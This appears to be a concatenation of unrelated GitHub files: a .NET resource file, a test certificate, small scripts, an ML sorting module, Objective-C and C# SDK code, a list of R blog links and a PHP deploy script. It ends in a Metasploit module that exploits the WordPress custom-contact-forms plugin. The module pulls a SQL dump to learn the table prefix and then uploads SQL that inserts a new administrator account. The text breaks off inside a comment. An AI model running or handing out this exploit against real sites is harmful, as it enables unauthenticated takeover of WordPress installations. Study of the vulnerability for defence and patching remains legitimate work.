<?xml version="1.0" encoding="utf-8"?> <root> <!-- Microsoft ResX Schema Version 2.0 The primary goals of this format is to allow a simple XML format that is mostly human readable. The generation and parsing of the various data types are done through the TypeConverter classes associated with the data types. Example: ... ado.net/XML headers & schema ... <resheader name="resmimetype">text/microsoft-resx</resheader> <resheader name="version">2.0</resheader> <resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader> <resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader> <data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data> <data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data> <data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64"> <value>[base64 mime encoded serialized .NET Framework object]</value> </data> <data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64"> <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value> <comment>This is a comment</comment> </data> There are any number of "resheader" rows that contain simple name/value pairs. Each data row contains a name, and value. The row also contains a type or mimetype. Type corresponds to a .NET class that support text/value conversion through the TypeConverter architecture. Classes that don't support this are serialized and stored with the mimetype set. The mimetype is used for serialized objects, and tells the ResXResourceReader how to depersist the object. This is currently not extensible. For a given mimetype the value must be set accordingly: Note - application/x-microsoft.net.object.binary.base64 is the format that the ResXResourceWriter will generate, however the reader can read any of the formats listed below. mimetype: application/x-microsoft.net.object.binary.base64 value : The object must be serialized with : System.Runtime.Serialization.Formatters.Binary.BinaryFormatter : and then encoded with base64 encoding. mimetype: application/x-microsoft.net.object.soap.base64 value : The object must be serialized with : System.Runtime.Serialization.Formatters.Soap.SoapFormatter : and then encoded with base64 encoding. mimetype: application/x-microsoft.net.object.bytearray.base64 value : The object must be serialized into a byte array : using a System.ComponentModel.TypeConverter : and then encoded with base64 encoding. 
--> <xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"> <xsd:import namespace="http://www.w3.org/XML/1998/namespace" /> <xsd:element name="root" msdata:IsDataSet="true"> <xsd:complexType> <xsd:choice maxOccurs="unbounded"> <xsd:element name="metadata"> <xsd:complexType> <xsd:sequence> <xsd:element name="value" type="xsd:string" minOccurs="0" /> </xsd:sequence> <xsd:attribute name="name" use="required" type="xsd:string" /> <xsd:attribute name="type" type="xsd:string" /> <xsd:attribute name="mimetype" type="xsd:string" /> <xsd:attribute ref="xml:space" /> </xsd:complexType> </xsd:element> <xsd:element name="assembly"> <xsd:complexType> <xsd:attribute name="alias" type="xsd:string" /> <xsd:attribute name="name" type="xsd:string" /> </xsd:complexType> </xsd:element> <xsd:element name="data"> <xsd:complexType> <xsd:sequence> <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" /> <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" /> </xsd:sequence> <xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" /> <xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" /> <xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" /> <xsd:attribute ref="xml:space" /> </xsd:complexType> </xsd:element> <xsd:element name="resheader"> <xsd:complexType> <xsd:sequence> <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" /> </xsd:sequence> <xsd:attribute name="name" type="xsd:string" use="required" /> </xsd:complexType> </xsd:element> </xsd:choice> </xsd:complexType> </xsd:element> </xsd:schema> <resheader name="resmimetype"> <value>text/microsoft-resx</value> </resheader> <resheader name="version"> <value>2.0</value> </resheader> <resheader name="reader"> <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value> </resheader> <resheader name="writer"> <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value> </resheader> <metadata name="folderBrowserDialog1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"> <value>17, 17</value> </metadata> </root>
{ "pile_set_name": "Github" }
-----BEGIN CERTIFICATE----- MIIDLjCCAhagAwIBAgIBATANBgkqhkiG9w0BAQUFADA3MREwDwYDVQQLDAhTZWN1 cml0eTEUMBIGA1UEAwwLTkRHIFRlc3QgQ0ExDDAKBgNVBAoMA05ERzAeFw0xNTAx MjExNDMzMThaFw0yMDAxMjAxNDMzMThaMDcxETAPBgNVBAsMCFNlY3VyaXR5MRQw EgYDVQQDDAtOREcgVGVzdCBDQTEMMAoGA1UECgwDTkRHMIIBIjANBgkqhkiG9w0B AQEFAAOCAQ8AMIIBCgKCAQEArq4QKUTRq45nCDR/p+OlHIIN8+ugUbiCfteazbTG rX8vIQ9HxSuz/xvxTw+E0KgA4YSK2SJJP4QiCjlMKYS3Rt8o361GNtnRmeo5qyBu GMSv73XL1uuqumggUZyrhhksckR7gyNFnKVXzZjAQPepsT0xBjs5uEAEqXJzAf+r 24AnT3MZRh7gsyEe3sZjd75kZVwcrWhrocyKlMCR77yEr+uP4pg+dEMhDMKKxlaF C5RPMotOpWm/7AToHrGia34WSmcxvuOwxOkI4xEW6mxWMaVTBCXUh6Wb/0m/x8Nv 9VvS2UBC4sCp4MqlDpySxQpT1RgrhMTEmtUOh50l4eEhdwIDAQABo0UwQzASBgNV HRMBAf8ECDAGAQH/AgEAMA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUkEvQjGOP Oj5DZEvsm96AdiiFXWgwDQYJKoZIhvcNAQEFBQADggEBAGD0kQASmNzvtYL+JUGf gTPyJhADl9Ai9GvZJsY/wX0IRTxRl5y08Dqlg3qyGG3GzL918cr1sVCYnLepNQES T0MIz50DCKGryNSc74JHPDxpYaSV6whmNH5iwh8fy6tmJwF3FWbGXD2ddc+ofJqP WPPJtzqxuuJ6iXQIFqD9mEn3iXVcvFuSzpdpH9paORTKB0j4gya9zctB8LP0ZXIE //wREc+4msnmoTn+qkFAOPBg9WnvoipfyCXPgbTagxlofVjZ7gAgYIefqhXBTQdd 5tnYdyQQBRcUXQS2bBX03q8ftcxOjc3SvXI4MvrqofuFPwu4GnrspnC0KQYlXwEI 7ds= -----END CERTIFICATE-----
{ "pile_set_name": "Github" }
#!/usr/bin/env node

var cli = require('cli');

var output_file = function (file) {
    cli.withInput(file, function (line, sep, eof) {
        if (!eof) {
            cli.output(line + sep);
        } else if (cli.args.length) {
            output_file(cli.args.shift());
        }
    });
};

if (cli.args.length) {
    output_file(cli.args.shift());
}
{ "pile_set_name": "Github" }
#
# Sorting
#
# -- Allen Leung

### "Never express yourself more clearly
### than you are able to think."
###
### -- Niels Bohr

api SORTING =
    api
        my sort:        (X * X -> Bool) -> List(X) -> List(X)
        my sort_uniq:   (X * X -> Bool) -> (X * X -> Bool) -> List(X) -> List(X)
        my merge:       (X * X -> Bool) -> List(X) * List(X) -> List(X)
        my merge_uniq:  (X * X -> Bool) -> (X * X -> Bool) -> List(X) * List(X) -> List(X)
        my merge_uniqs: (X * X -> Bool) -> (X * X -> Bool) -> List( List(X) ) -> List(X)
        my uniq:        (X * X -> Bool) -> List(X) -> List(X)
    end

package Sorting: SORTING =
    pkg
        infix ====

        fun gensort merge op< l =
            let
                fun sort [] = []
                  | sort (l as [x]) = l
                  | sort (l as [x, y]) = if x < y then l else [y, x]
                  | sort l =
                        let
                            fun split ([], a, b) = (a, b)
                              | split (x . xs, a, b) = split (xs, b, x . a)

                            my (a, b) = split (l,[],[])
                        in
                            merge (sort a, sort b)
                        end
            in
                sort l
            end

        fun merge op< (a, b) =
            let
                fun m ([], a) = a
                  | m (a,[]) = a
                  | m (a as (u . v), b as (w . x)) =
                        if u < w then u . m (v, b)
                        else w . m (a, x)
            in
                m (a, b)
            end

        fun merge_uniq op< op==== (a, b) =
            let
                fun m ([], a) = uniq op==== a
                  | m (a,[]) = uniq op==== a
                  | m (a as (u . v), b as (w . x)) =
                        if u ==== w then m (a, x)
                        else if u < w then u . m (v, b)
                        else w . m (a, x)
            in
                m (a, b)
            end

        and uniq op==== l =
            let
                fun f [] = []
                  | f (l as [x]) = l
                  | f (x . (l as (y . z))) =
                        if x ==== y then f l
                        else x . f l
            in
                f l
            end

        fun sort op< l = gensort (merge op<) op< l

        fun sort_uniq op< op==== l = gensort (merge_uniq op< op====) op< l

        fun merge_uniqs op< op==== l = sort_uniq op< op==== (list::cat l)
    end
{ "pile_set_name": "Github" }
# Changelog

All notable changes to this project will be documented in this file.

The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).

## [1.0.5] - 2018-08-25
### Changed
- Removed `prepublish` script from `package.json`

## [1.0.4] - 2017-08-08
### New
- Added a changelog

### Changed
- Ignore `yarn.lock` and `package-lock.json` files
{ "pile_set_name": "Github" }
/// /// Copyright (c) 2020 Dropbox, Inc. All rights reserved. /// #import "DBURLSessionTaskWithTokenRefresh.h" #import "DBAccessTokenProvider.h" #import "DBDelegate.h" #import "DBOAuthResult.h" #import "DBURLSessionTaskResponseBlockWrapper.h" @interface DBURLSessionTaskWithTokenRefresh () @property (nonatomic, weak) DBDelegate *taskDelegate; @property (nonatomic, strong) DBURLSessionTaskCreationBlock taskCreationBlock; @property (nonatomic, strong) id<DBAccessTokenProvider> tokenProvider; @property (nonatomic, strong) DBProgressBlock progressBlock; @property (nonatomic, strong) NSOperationQueue *progressQueue; @property (nonatomic, strong) DBURLSessionTaskResponseBlockWrapper *responseBlockWrapper; @property (nonatomic, strong) NSOperationQueue *responseQueue; @property (nonatomic, strong) dispatch_queue_t serialQueue; @property (nonatomic, strong, nullable) NSURLSessionTask *sessionTask; @property (nonatomic, assign) BOOL cancelled; @property (nonatomic, assign) BOOL suspended; @property (nonatomic, assign) BOOL started; @end @implementation DBURLSessionTaskWithTokenRefresh @synthesize session = _session; - (instancetype)initWithTaskCreationBlock:(DBURLSessionTaskCreationBlock)taskCreationBlock taskDelegate:(DBDelegate *)taskDelegate urlSession:(NSURLSession *)urlSession tokenProvider:(id<DBAccessTokenProvider>)tokenProvider { self = [super init]; if (self) { _taskCreationBlock = taskCreationBlock; _taskDelegate = taskDelegate; _session = urlSession; _tokenProvider = tokenProvider; dispatch_queue_attr_t qosAttribute = dispatch_queue_attr_make_with_qos_class(DISPATCH_QUEUE_SERIAL, QOS_CLASS_USER_INITIATED, 0); _serialQueue = dispatch_queue_create("com.dropbox.dropbox_sdk_obj_c.DBURLSessionTaskWithTokenRefresh.queue", qosAttribute); } return self; } - (id<DBURLSessionTask>)duplicate { return [[DBURLSessionTaskWithTokenRefresh alloc] initWithTaskCreationBlock:_taskCreationBlock taskDelegate:_taskDelegate urlSession:_session tokenProvider:_tokenProvider]; } - (void)cancel { dispatch_async(_serialQueue, ^{ self->_cancelled = YES; [self->_sessionTask cancel]; }); } - (void)suspend { dispatch_async(_serialQueue, ^{ self->_suspended = YES; [self->_sessionTask suspend]; }); } - (void)resume { dispatch_async(_serialQueue, ^{ if (self->_started) { [self->_sessionTask resume]; } else { self->_started = YES; [self db_start]; } }); } - (void)setProgressBlock:(DBProgressBlock)progressBlock queue:(NSOperationQueue *)queue { dispatch_async(_serialQueue, ^{ self->_progressBlock = progressBlock; self->_progressQueue = queue; [self db_setProgressHandlerIfNecessary]; }); } - (void)setResponseBlock:(DBURLSessionTaskResponseBlockWrapper *)responseBlockWrapper queue:(NSOperationQueue *)queue { dispatch_async(_serialQueue, ^{ self->_responseBlockWrapper = responseBlockWrapper; self->_responseQueue = queue; [self db_setResponseHandlerIfNecessary]; }); } #pragma mark Private helpers - (void)db_start { DBOAuthCompletion completion = ^(DBOAuthResult *result) { dispatch_async(self->_serialQueue, ^{ [self db_handleTokenRefreshResult:result]; }); }; if (_tokenProvider) { [_tokenProvider refreshAccessTokenIfNecessary:completion]; } else { completion(nil); } } - (void)db_handleTokenRefreshResult:(DBOAuthResult *)result { if ([result isError] && result.errorType != DBAuthInvalidGrant) { // Refresh failed, due to an error that's not invalid grant, e.g. A refresh request timed out. // Complete request with error immediately, so developers could retry and get access token refreshed. 
// Otherwise, the API request may proceed with an expired access token which would lead to // a false positive auth error. [self db_completeWithError:result.nsError]; } else { // Refresh succeeded or a refresh is not required, i.e. access token is valid, continue request normally. // Or // Refresh failed due to invalid grant, e.g. refresh token revoked by user. // Continue, and the API call would failed with an auth error that developers can handle properly. // e.g. Sign out the user upon auth error. [self db_initializeSessionTask]; } } - (void)db_initializeSessionTask { _sessionTask = _taskCreationBlock(); [self db_setProgressHandlerIfNecessary]; [self db_setResponseHandlerIfNecessary]; if (_cancelled) { [_sessionTask cancel]; } else if (_suspended) { [_sessionTask suspend]; } else if (_started) { [_sessionTask resume]; } } - (void)db_setProgressHandlerIfNecessary { if (_sessionTask && _progressBlock) { [_taskDelegate addProgressHandlerForTaskWithIdentifier:_sessionTask.taskIdentifier session:_session progressHandler:_progressBlock progressHandlerQueue:_progressQueue]; } } - (void)db_setResponseHandlerIfNecessary { if (_sessionTask == nil || _responseBlockWrapper == nil) { return; } if (_responseBlockWrapper.rpcResponseBlock) { [_taskDelegate addRpcResponseHandlerForTaskWithIdentifier:_sessionTask.taskIdentifier session:_session responseHandler:_responseBlockWrapper.rpcResponseBlock responseHandlerQueue:_responseQueue]; } else if (_responseBlockWrapper.uploadResponseBlock) { [_taskDelegate addUploadResponseHandlerForTaskWithIdentifier:_sessionTask.taskIdentifier session:_session responseHandler:_responseBlockWrapper.uploadResponseBlock responseHandlerQueue:_responseQueue]; } else if (_responseBlockWrapper.downloadResponseBlock) { [_taskDelegate addDownloadResponseHandlerForTaskWithIdentifier:_sessionTask.taskIdentifier session:_session responseHandler:_responseBlockWrapper.downloadResponseBlock responseHandlerQueue:_responseQueue]; } } - (void)db_completeWithError:(NSError *)error { NSOperationQueue *queue = _responseQueue ?: [NSOperationQueue mainQueue]; DBURLSessionTaskResponseBlockWrapper *blockWrapper = _responseBlockWrapper; [queue addOperationWithBlock:^{ if (blockWrapper.rpcResponseBlock) { blockWrapper.rpcResponseBlock(nil, nil, error); } else if (blockWrapper.uploadResponseBlock) { blockWrapper.uploadResponseBlock(nil, nil, error); } else if (blockWrapper.downloadResponseBlock) { blockWrapper.downloadResponseBlock(nil, nil, error); } }]; } @end
{ "pile_set_name": "Github" }
using FModel.Creator.Texts; using PakReader.Pak; using PakReader.Parsers.Class; using PakReader.Parsers.PropertyTagData; namespace FModel.Creator.Bundles { public class Quest { public string Description; public int Count; public Reward Reward; public Quest() { Description = ""; Count = 0; Reward = null; } public Quest(UObject obj) : this() { if (obj.TryGetValue("Description", out var d) && d is TextProperty description) Description = Text.GetTextPropertyBase(description); if (obj.TryGetValue("ObjectiveCompletionCount", out var o) && o is IntProperty objectiveCompletionCount) Count = objectiveCompletionCount.Value; if (obj.TryGetValue("Objectives", out var v1) && v1 is ArrayProperty a1 && a1.Value.Length > 0 && a1.Value[0] is StructProperty s && s.Value is UObject objectives) { if (string.IsNullOrEmpty(Description) && objectives.TryGetValue("Description", out var od) && od is TextProperty objectivesDescription) Description = Text.GetTextPropertyBase(objectivesDescription); if (Count == 0 && objectives.TryGetValue("Count", out var c) && c is IntProperty count) Count = count.Value; } if (obj.TryGetValue("RewardsTable", out var v4) && v4 is ObjectProperty rewardsTable) { PakPackage p = Utils.GetPropertyPakPackage(rewardsTable.Value.Resource.OuterIndex.Resource.ObjectName.String); if (p.HasExport() && !p.Equals(default)) { var u = p.GetExport<UDataTable>(); if (u != null && u.TryGetValue("Default", out var i) && i is UObject r && r.TryGetValue("TemplateId", out var i1) && i1 is NameProperty templateId && r.TryGetValue("Quantity", out var i2) && i2 is IntProperty quantity) { Reward = new Reward(quantity, templateId); } } } if (Reward == null && obj.TryGetValue("Rewards", out var v2) && v2 is ArrayProperty rewards) { foreach (StructProperty reward in rewards.Value) { if (reward.Value is UObject r1 && r1.TryGetValue("ItemPrimaryAssetId", out var i1) && i1 is StructProperty itemPrimaryAssetId && r1.TryGetValue("Quantity", out var i2) && i2 is IntProperty quantity) { if (itemPrimaryAssetId.Value is UObject r2 && r2.TryGetValue("PrimaryAssetType", out var t1) && t1 is StructProperty primaryAssetType && r2.TryGetValue("PrimaryAssetName", out var t2) && t2 is NameProperty primaryAssetName) { if (primaryAssetType.Value is UObject r3 && r3.TryGetValue("Name", out var k) && k is NameProperty name) { if (!name.Value.String.Equals("Quest") && !name.Value.String.Equals("Token") && !name.Value.String.Equals("ChallengeBundle") && !name.Value.String.Equals("GiftBox")) { Reward = new Reward(quantity, primaryAssetName); break; } } } } } } if (Reward == null && obj.TryGetValue("HiddenRewards", out var v3) && v3 is ArrayProperty hiddenRewards) { foreach (StructProperty reward in hiddenRewards.Value) { if (reward.Value is UObject r1 && r1.TryGetValue("TemplateId", out var i1) && i1 is NameProperty templateId && r1.TryGetValue("Quantity", out var i2) && i2 is IntProperty quantity) { Reward = new Reward(quantity, templateId); break; } } } } } }
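// Descriptive note (not part of the original FModel source): the constructor above
// resolves quest data in a fixed fallback order. Description and the completion count
// are read from the quest object first, then from the first "Objectives" entry; the
// reward comes from the "Default" row of the referenced "RewardsTable", otherwise from
// the "Rewards" array (skipping Quest, Token, ChallengeBundle and GiftBox asset types),
// and finally from "HiddenRewards".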
{ "pile_set_name": "Github" }
[ { "title": "Introducing tidyr", "href": "https://blog.rstudio.org/2014/07/22/introducing-tidyr/" }, { "title": "R / Finance 2013 Call for Papers", "href": "http://dirk.eddelbuettel.com/blog/2012/12/17/" }, { "title": "R: How to Transform “prob” Predictions to a Single Column of Predicted Values", "href": "http://hack-r.com/r-how-to-transform-prob-predictions-to-a-single-column-of-predicted-values/" }, { "title": "expectation-propagation and ABC", "href": "https://xianblog.wordpress.com/2011/08/24/expectation-propagation-and-abc/" }, { "title": "Portable, personal packages", "href": "http://rmflight.github.io/posts/2013/09/github_packages.html" }, { "title": "Programmers Should Know R", "href": "http://www.win-vector.com/blog/2011/08/programmers-should-know-r/?utm_source=rss&utm_medium=rss&utm_campaign=programmers-should-know-r" }, { "title": "magrittr", "href": "http://ipub.com/magrittr/" }, { "title": "InfoWorld: SAS and SPSS rise to R opportunity", "href": "https://web.archive.org/web/http://blog.revolution-computing.com/2010/02/infoworld-sas-and-spss-rise-to-r-opportunity.html" }, { "title": "Strata 2015: Keynote roundup", "href": "http://blog.revolutionanalytics.com/2015/02/strata-2015-keynote-roundup.html" }, { "title": "NBA Drafting", "href": "http://www.moreorlessnumbers.com/2014/06/nba-drafting.html" }, { "title": "Sustainability through Energy Load Shaping for Buildings using R", "href": "http://blog.revolutionanalytics.com/2016/07/energy-load-shaping.html" }, { "title": "My first competition at Kaggle", "href": "https://web.archive.org/web/http://www.investuotojas.eu/2012/07/02/my-first-competition-at-kaggle/" }, { "title": "Career NBA: The Road Least Traveled", "href": "https://feedproxy.google.com/~r/graphoftheweek/fzVA/~3/tZBRCMSLvEs/career-nba-road-least-traveled.html" }, { "title": "R syntax highlighting for Smultron", "href": "https://web.archive.org/web/https://dataninja.wordpress.com/2006/06/14/r-syntax-highlighting-for-smultron/" }, { "title": "Size of XDF files using RevoScaleR package", "href": "https://tomaztsql.wordpress.com/2016/09/22/size-of-xdf-files-using-revoscaler-package/" }, { "title": "Examples and resources on association rule mining with R", "href": "https://rdatamining.wordpress.com/2012/07/13/examples-and-resources-on-association-rule-mining-with-r/" }, { "title": "Recent Common Ancestors: Simple Model", "href": "http://www.exegetic.biz/blog/2015/05/recent-common-ancestors/" }, { "title": "the Art of R Programming [guest post]", "href": "https://xianblog.wordpress.com/2012/01/31/the-art-of-r-programming-guest-post/" }, { "title": "A handy concatenation operator", "href": "https://ctszkin.com/2013/02/12/a-handy-concatenatio-operator/" }, { "title": "Beta and expected returns", "href": "https://feedproxy.google.com/~r/PortfolioProbeRLanguage/~3/XEiC8lNt_As/" }, { "title": "vennpieR: combination of venn diagram and pie chart in R", "href": "http://onetipperday.sterding.com/2014/09/vennpier-combination-of-venn-diagram.html" }, { "title": "Build multiarch R (32 bit and 64 bit) on Debian/Ubuntu", "href": "https://web.archive.org/web/http://blog.nguyenvq.com/2011/08/10/build-multiarch-r-32-bit-and-64-bit-on-debianubuntu/" }, { "title": "Set up Sublime Text for light-weight all-in-one data science IDE", "href": "http://opiateforthemass.es/articles/set-up-sublime-text-for-light-weight-all-in-one-data-science-ide/" }, { "title": "Quick Shiny Demo – Exploring NHS Winter Sit Rep Data", "href": 
"https://blog.ouseful.info/2012/11/28/quick-shiny-demo-exploring-nhs-winter-sit-rep-data/" }, { "title": "BayesFactorExtras: a sneak preview", "href": "http://bayesfactor.blogspot.com/2015/02/bayesfactorextras-sneak-preview.html" }, { "title": "Data visualization in social sciences – what’s new in the sjPlot-package? #rstats", "href": "https://strengejacke.wordpress.com/2016/05/19/data-visualization-in-social-sciences-whats-new-in-the-sjplot-package-rstats/" }, { "title": "R/Finance 2013 Call for Papers", "href": "https://tradeblotter.wordpress.com/2013/01/05/rfinance-2013-call-for-papers/" }, { "title": "Le Monde puzzle [#840]", "href": "https://xianblog.wordpress.com/2013/11/23/le-monde-puzzle-840/" }, { "title": "Select operations on R data frames", "href": "http://digitheadslabnotebook.blogspot.com/2009/07/select-operations-on-r-data-frames.html" }, { "title": "Simulating Win/Loss streaks with R rle function", "href": "http://intelligenttradingtech.blogspot.com/2011/05/simulating-winloss-streaks-with-r-rle.html" }, { "title": "an attempt at EP-ABC from scratch, nothing more… [except for a few bugs]", "href": "https://xianblog.wordpress.com/2016/10/19/an-attempt-at-ep-abc-from-scratch-nothing-more-except-for-a-few-bugs/" }, { "title": "Linear Regression using R", "href": "http://www.tatvic.com/blog/linear-regression-using-r/" }, { "title": "ABC model choice by random forests", "href": "https://xianblog.wordpress.com/2014/06/25/abc-model-choice-by-random-forests/" }, { "title": "The Relative Importance of Predictors – Let the Games Begin!", "href": "http://joelcadwell.blogspot.com/2012/08/the-relative-importance-of-predictors.html" }, { "title": "Project Euler — problem 7", "href": "https://web.archive.org/web/http://ec2-184-73-106-109.compute-1.amazonaws.com/wordpress/?p=95" }, { "title": "Portfolio Risk Surfaces", "href": "https://www.rmetrics.org/blog/RiskSurfaces" }, { "title": "Who Has the Best Fantasy Football Projections? 2016 Update", "href": "http://fantasyfootballanalytics.net/2016/03/best-fantasy-football-projections-2016-update.html" }, { "title": "Whale charts – Visualising customer profitability", "href": "http://www.magesblog.com/2014/01/whale-charts-visualising-customer.html" }, { "title": "Look ma! No typing! 
Autorunning code on R startup", "href": "https://4dpiecharts.com/2012/07/20/look-ma-no-typing-autorunning-code-on-r-startup/" }, { "title": "Implementing the CountSummary Procedure", "href": "http://exploringdatablog.blogspot.com/2012/09/implementing-countsummary-procedure.html" }, { "title": "Project Euler — Problem 187", "href": "https://web.archive.org/web/http://www.cwcity.de/fehler/404.php" }, { "title": "The making of cricket package yorkr – Part 1", "href": "https://gigadom.wordpress.com/2016/03/05/the-making-of-cricket-package-yorkr-part-1-2/" }, { "title": "Veterinary Epidemiologic Research: Linear Regression Part 2 – Checking assumptions", "href": "https://denishaine.wordpress.com/2013/03/07/veterinary-epidemiologic-research-linear-regression-part-2-checking-assumptions/" }, { "title": "How to Remember the Poisson Distribution", "href": "http://perfdynamics.blogspot.com/2014/07/how-to-remember-poisson-distribution.html" }, { "title": "Time Series Decomposition", "href": "http://r-datameister.blogspot.com/2013/08/time-series-decomposition.html" }, { "title": "Making Back-to-Back Histograms", "href": "https://hopstat.wordpress.com/2014/06/10/making-back-to-back-histograms/" }, { "title": "Social Network Analysis using R and Gephis", "href": "http://www.rcasts.com/2010/04/social-network-analysis-using-r-and.html" }, { "title": "ggplot2 2.1.0", "href": "https://blog.rstudio.org/2016/03/03/ggplot2-2-1-0/" }, { "title": "Smoothing Techniques using basis functions: Gaussian Basis", "href": "http://datascienceplus.com/smoothing-techniques-using-basis-functions-gaussian-basis/" }, { "title": "Fast-track publishing using knitr: stitching it together (part V)", "href": "http://gforge.se/2014/01/fast-track-publishing-using-knitr-part-v/" } ]
{ "pile_set_name": "Github" }
<?php /** * @package deployment */ require_once (__DIR__ . '/../../bootstrap.php'); $script = realpath(dirname(__FILE__) . "/../../../tests/standAloneClient/exec.php"); $xml = realpath(dirname(__FILE__) . "/../../updates/scripts/xml/2020_03_30_User_Deleted_A_Comment.template.xml"); deployTemplate($script, $xml); $xml = realpath(dirname(__FILE__) . "/../../updates/scripts/xml/2020_03_30_User_Deleted_A_Comment_AppSpecific.template.xml"); deployTemplate($script, $xml); $xml = realpath(dirname(__FILE__) . "/../../updates/scripts/xml/2020_03_30_User_Replied_To_Comment.template.xml"); deployTemplate($script, $xml); $xml = realpath(dirname(__FILE__) . "/../../updates/scripts/xml/2020_03_30_User_Replied_To_Comment_AppSpecific.template.xml"); deployTemplate($script, $xml); function deployTemplate($script, $config) { if(!file_exists($config)) { KalturaLog::err("Missing file [$config] will not deploy"); return; } passthru("php $script $config"); }
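// Illustrative only (not part of the original script): for each template file that exists,
// deployTemplate() shells out to the stand-alone client, effectively running
//   php .../tests/standAloneClient/exec.php .../updates/scripts/xml/2020_03_30_User_Deleted_A_Comment.template.xml
// and it logs an error and skips any template XML that is missing on disk.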
{ "pile_set_name": "Github" }
#ifndef LOCALCLEANSCHEDULER_H #define LOCALCLEANSCHEDULER_H #include <QDialog> #include "QMegaMessageBox.h" #include "megaapi.h" namespace Ui { class LocalCleanScheduler; } class LocalCleanScheduler : public QDialog { Q_OBJECT public: explicit LocalCleanScheduler(QWidget *parent = 0); bool daysLimit(); int daysLimitValue(); void setDaysLimit(bool value); void setDaysLimitValue(int limit); ~LocalCleanScheduler(); private: Ui::LocalCleanScheduler *ui; protected: void changeEvent(QEvent *event); private slots: void on_cRemoveFilesOlderThan_clicked(); void on_bOK_clicked(); void on_bCancel_clicked(); }; #endif // LOCALCLEANSCHEDULER_H
{ "pile_set_name": "Github" }
#!/usr/bin/env bash echo Starting Karma without any tests to download dependencies ./node_modules/.bin/karma start ./config/karma.config.js --no-fail-on-empty-test-suite --reporters=quiet
{ "pile_set_name": "Github" }
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress custom-contact-forms Plugin SQL Upload', 'Description' => %q{ The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download a SQL dump of the plugins database tables. It's also possible to upload files containing SQL statements which will be executed. The module first tries to extract the WordPress table prefix from the dump and then attempts to create a new admin user. }, 'Author' => [ 'Marc-Alexandre Montpas', # Vulnerability discovery 'Christian Mehlmauer' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ], [ 'WPVDB', '7542' ] ], 'DisclosureDate' => 'Aug 07 2014' )) end def get_sql(table_prefix, username, password) # create user sql = "INSERT INTO #{table_prefix}users (user_login, user_pass) VALUES ('#{username}','#{Rex::Text.md5(password)}');" # make user administrator sql << "INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}capabilities','a:1:{s:13:\"administrator\";b:1;}'),((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}user_level','10');" sql end def get_table_prefix res = send_request_cgi({ 'uri' => wordpress_url_admin_post, 'method' => 'POST', 'vars_post' => { 'ccf_export' => "1" } }) return nil if res.nil? || res.code != 302 || res.headers['Location'] !~ /\.sql$/ file = res.headers['Location'] res_file = send_request_cgi('uri' => file) return nil if res_file.nil? || res_file.code != 200 || res_file.body.nil? match = res_file.body.match(/insert into `(.+_)customcontactforms_fields`/i) return nil if match.nil? || match.length < 2 table_prefix = match[1] table_prefix end def run username = Rex::Text.rand_text_alpha(10) password = Rex::Text.rand_text_alpha(20) print_status("Trying to get table_prefix") table_prefix = get_table_prefix if table_prefix.nil? print_error("Unable to get table_prefix") return else print_status("got table_prefix '#{table_prefix}'") end data = Rex::MIME::Message.new data.add_part(get_sql(table_prefix, username, password), 'text/plain', nil, "form-data; name=\"import_file\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.sql\"") data.add_part('1', nil, nil, 'form-data; name="ccf_merge_import"') post_data = data.to_s print_status("Inserting user #{username} with password #{password}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res.nil? 
|| res.code != 302 || res.headers['Location'] != 'options-general.php?page=custom-contact-forms' fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end # test login cookie = wordpress_login(username, password) # login successful if cookie print_good("User #{username} with password #{password} successfully created") store_valid_credential(user: username, private: password, proof: cookie) else print_error("User creation failed") return end end end
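# Illustrative only: the values below are placeholders, not module options. With a
# recovered table prefix of 'wp_', get_sql('wp_', 'msfuser', 'msfpass') builds an upload
# whose statements are equivalent to:
#
#   INSERT INTO wp_users (user_login, user_pass)
#     VALUES ('msfuser', '<md5 of msfpass>');
#   INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES
#     ((select id from wp_users where user_login='msfuser'), 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
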